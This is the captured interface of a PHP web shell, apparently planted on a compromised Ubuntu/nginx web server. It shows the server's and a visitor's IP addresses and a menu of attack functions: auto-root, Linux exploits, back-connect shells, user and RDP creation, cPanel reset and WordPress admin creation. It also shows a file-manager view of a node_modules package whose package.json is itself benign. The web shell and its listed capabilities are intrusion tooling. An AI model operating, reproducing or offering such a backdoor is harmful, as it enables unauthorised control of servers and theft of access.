Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
jsonpointer /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE.md
1.13
KB
-rw-rw-rw-
README.md
1.25
KB
-rw-rw-rw-
jsonpointer.d.ts
666
B
-rw-rw-rw-
jsonpointer.js
2.53
KB
-rw-rw-rw-
package.json
1.04
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "jsonpointer", "description": "Simple JSON Addressing.", "tags": [ "util", "simple", "util", "utility" ], "version": "5.0.1", "author": "Jan Lehnardt <jan@apache.org>", "contributors": [ "Joe Hildebrand <joe-github@cursive.net>", "Marc Bachmann <marc.brookman@gmail.com>" ], "repository": { "type": "git", "url": "https://github.com/janl/node-jsonpointer.git" }, "bugs": { "url": "http://github.com/janl/node-jsonpointer/issues" }, "engines": { "node": ">=0.10.0" }, "main": "./jsonpointer", "typings": "jsonpointer.d.ts", "files": [ "jsonpointer.js", "jsonpointer.d.ts" ], "scripts": { "test": "npm run test:standard && npm run test:all", "test:standard": "standard", "test:all": "node test.js", "semantic-release": "semantic-release pre && npm publish && semantic-release post" }, "license": "MIT", "devDependencies": { "semantic-release": "^18.0.0", "standard": "^16.0.4" }, "standard": { "ignore": [ "test.js" ] } }
Close